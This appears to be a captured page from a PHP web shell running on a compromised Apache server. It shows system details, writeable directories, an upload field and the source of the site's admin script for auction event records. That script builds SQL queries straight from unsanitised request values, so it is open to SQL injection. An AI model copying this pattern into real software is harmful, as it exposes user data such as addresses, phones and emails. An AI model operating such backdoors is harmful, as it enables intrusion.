KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/www/admin/Proc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/queenjbs/www/admin/Proc/event5_update.php
<?include "$DOCUMENT_ROOT/conf/conf_dir.php";?>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<?
		
		$price = str_replace(",","",$price);
		
		if($mode == "detail"){
			
			$queryupok = "update AUCTION_EVENT5  set bidder='$bidder', user='$user', price='$price' ,zip='$zip',addr='$addr' ,tel='$tel' ,email='$email',orderstep = '$status',memo='$memo' where no = '$idx'";
			$queryupok_result = mysql_query($queryupok,$db_con);
			echo "<script>location.href='../event_list_201508_detail.php?idx=$idx';</script>";
		}elseif($mode == "insert"){
			$goodName = "NO.".$goodsNum;
			echo $queryupok2 = "INSERT INTO `AUCTION_EVENT5` (`no`, `goodName`, `reg_date`, `goodsNum`, `price`, `bidder`, `user`, `zip`, `addr`, `tel`, `email`,`orderstep`,`memo`) 
			VALUES 
			(
			'$no',
			'$goodName', 
			'$reg_date', 
			'$goodsNum', 
			'$price', 
			'$bidder',
			'$user',
			'$zip',
			'$addr',
			'$tel', 
			'$email',
			'$status',
			'$memo'
			)";
						
			$queryupok_result = mysql_query($queryupok2,$db_con);
			echo "<script>location.href='../event_list_201508_detail.php?idx=$no';</script>";
		}else{
			$queryupok = "update AUCTION_EVENT5  set orderstep = '$flag' $datevalue where no = '$idx'";
			$queryupok_result = mysql_query($queryupok,$db_con);
			echo "<script>location.href='../event_list_201508.html';</script>";
		}
?>

Anon7 - 2021